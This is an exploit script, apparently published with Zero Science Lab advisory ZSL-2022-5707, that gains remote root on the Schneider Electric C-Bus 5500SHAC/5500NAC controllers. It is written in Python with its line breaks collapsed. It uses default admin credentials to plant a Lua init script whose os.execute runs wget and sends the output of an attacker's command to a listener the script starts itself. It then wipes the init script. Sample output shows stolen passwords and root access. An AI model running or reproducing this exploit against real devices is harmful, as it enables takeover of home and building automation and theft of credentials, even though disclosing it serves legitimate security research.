Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root

#!/usr/bin/env python3# -*- coding: utf-8 -*-### Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit### Vendor: Schneider Electric SE# Product web page: https://www.se.com | https://www.clipsal.com# Product details:# - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC# - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/# Affected version: CLIPSAL 5500SHAC (i.MX28)#                   CLIPSAL 5500NAC (i.MX28)#                   SW: 1.10.0, 1.6.0#                   HW: 1.0#                   Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2#                   SpaceLogic C-Bus## Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser# for C-Bus Automation Controller (5500SHAC)) is an advanced controller from# Schneider Electric. It is specifically designed to unite the C-Bus home# automation solution with common household communication protocols, from# lighting and climate control, to security, entertainment and energy metering.# The Wiser for C-Bus Automation Controller manages and controls C-Bus systems# for residential homes or zones within a building and integrates functions# such as heating/cooling, energy/load monitoring and remote control for C-Bus# and Modbus.## Desc: The automation controller suffers from an authenticated arbitrary# command execution vulnerability. An attacker can abuse the Start-up (init)# script editor and exploit the 'script' POST parameter to insert malicious# Lua script code and execute commands with root privileges that will grant# full control of the device.## ------------------------------------------------------------------------------# $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888# ----------------------------------------------------------------------# Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38# [*] Starting exfiltration handler on port 8888# [*] Writing Lua initscript... done.# [*] Running os.execute()... done.# [*] Got request from 192.168.0.10:33522# [*] Printing target's request:## b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user# 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption# password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection:# close\r\n\r\n"## [*] Cleaning up... done.## $ # ------------------------------------------------------------------------------## Tested on: CPU model: ARM926EJ-S rev 5 (v5l)#            GNU/Linux 4.4.115 (armv5tejl)#            LuaJIT 2.0.5#            FlashSYS v2#            nginx### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2022-5707# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php### 12.03.2022#import threading#!import datetime##!import requests##!import socket####!import time######!import sys#######!import re########!from requests.auth import HTTPBasicAuthfrom time import sleep as spikajclass Wiser:    def __init__(self):        self.headers = None        self.uri = '/scada-main/scripting/'        self.savs = self.uri + 'save'        self.runs = self.uri + 'run'        self.start = datetime.datetime.now()        self.start = self.start.strftime('%d.%m.%Y %H:%M:%S')        self.creds = HTTPBasicAuth('admin', 'admin123')    def memo(self):        if len(sys.argv) != 5:            self.use()        else:            self.target = sys.argv[1]            self.execmd = sys.argv[2]            self.localh = sys.argv[3]            self.localp = int(sys.argv[4])            if not 'http' in self.target:                self.target = 'http://{}'.format(self.target)    def exfil(self):        print('[*] Starting exfiltration handler on port {}'.format(self.localp))        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        s.bind(('0.0.0.0', self.localp))        while True:            try:                s.settimeout(9)                s.listen(1)                conn, addr = s.accept()                print('[*] Got request from {}:{}'.format(addr[0], addr[1]))                data = conn.recv(2003)                print('[*] Printing target\'s request:')                print('\n%s' %data)            except socket.timeout as p:                print('[!] Something\'s not right. Check your port mappings!')            break        s.close()        self.clean()    def mtask(self):        konac = threading.Thread(name='thricer.exe', target=self.exfil)        konac.start()        self.byts()    def byts(self):        self.headers = {            'Referer':self.target+'/scada-main/main/editor?id=initscript',            'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"',            'Cookie':'x-logout=0; x-auth=; x-login=1; pin=',            'Content-Type':'text/plain;charset=UTF-8',            'User-Agent':'SweetHomeAlabama/2003.59',            'X-Requested-With':'XMLHttpRequest',            'Accept-Language':'en-US,en;q=0.9',            'Accept-Encoding':'gzip, deflate',            'Sec-Ch-Ua-Platform':'"Windows"',            'Sec-Fetch-Site':'same-origin',            'Connection':'keep-alive',            'Sec-Fetch-Dest':'empty',            'Sec-Ch-Ua-Mobile':'?0',            'Sec-Fetch-Mode':'cors',            'Origin':self.target,            'Accept':'*/*',            'sec-gpc':'1'            }            self.loada  = '\x64\x61\x74\x61\x3D\x7B'                                                                     # data={        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C'                 # "ext-comp-1004":"",        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C'                 # "ext-comp-1005":"",        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C'                 # "ext-comp-1006":"",        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C'                 # "ext-comp-1007":"",        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C'                 # "ext-comp-1008":"",        self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"",        self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C'                     # "id":"initscript",        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C'                                     # "script":null,        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D'             # "scriptonly":"true"}        self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65'                     # &script=os.execute        self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60'                                             # ('wget -U "`        self.loada += self.execmd                                                                                    # [command input]        self.loada += '\x60\x22\x20'                                                                                 # `".        self.loada += self.localh+':'+str(self.localp)                                                               # [listener input]        self.loada += '\x27\x29'                                                                                     # ')        self.loadb  = '\x64\x61\x74\x61\x3D\x7B'                                                                     # data={        self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D'                     # "id":"initscript"}                print('[*] Writing Lua initscript... ', end='')        sys.stdout.flush()        spikaj(0.7)        htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds)        if not 'success' in htreq.text:            print('didn\'t work!')            exit(17)        else:            print('done.')                print('[*] Running os.execute()... ', end='')        sys.stdout.flush()        spikaj(0.7)        htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds)        if not 'success' in htreq.text:            print('didn\'t work!')            exit(19)        else:            print('done.')    def splash(self):        Baah_loon = '''     ######   ##########  ######    _\_  ##===----[.].]  #(     ,   _\\   #      )\__|    \        /     `-._``-'        >@         |         |         |         |         |  Schneider Electric C-Bus SmartHome Automation Controller         |        Root Remote Code Execution Proof of Concept         |                       ZSL-2022-5707         |         |         |        '''        print(Baah_loon)    def use(self):        self.splash()        print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')        exit(0)    def clean(self):        print('\n[*] Cleaning up... ', end='')        sys.stdout.flush()        spikaj(0.7)        self.headers = {'X-Requested-With':'XMLHttpRequest'}        self.blank  = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32'        self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30'        self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32'        self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78'        self.dlank  = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35'        self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32'        self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D'        self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32'        self.clank  = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25'        self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F'        self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25'        self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'        self.slank  = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70'        self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41'        self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32'        self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70'        self.glank  = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25'        self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'        self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41'        self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69'        self.hlank  = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32'        self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33'        self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25'        self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C'        self.flank  = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74'        self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######'        self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}'        htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds)        if not 'success' in htreq.text:            print('didn\'t work!')            exit(18)        else:            print('done.')            exit(-1)    def main(self):        print('-'*70)        print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)        self.memo(), self.mtask()if __name__ == '__main__':    Wiser().main()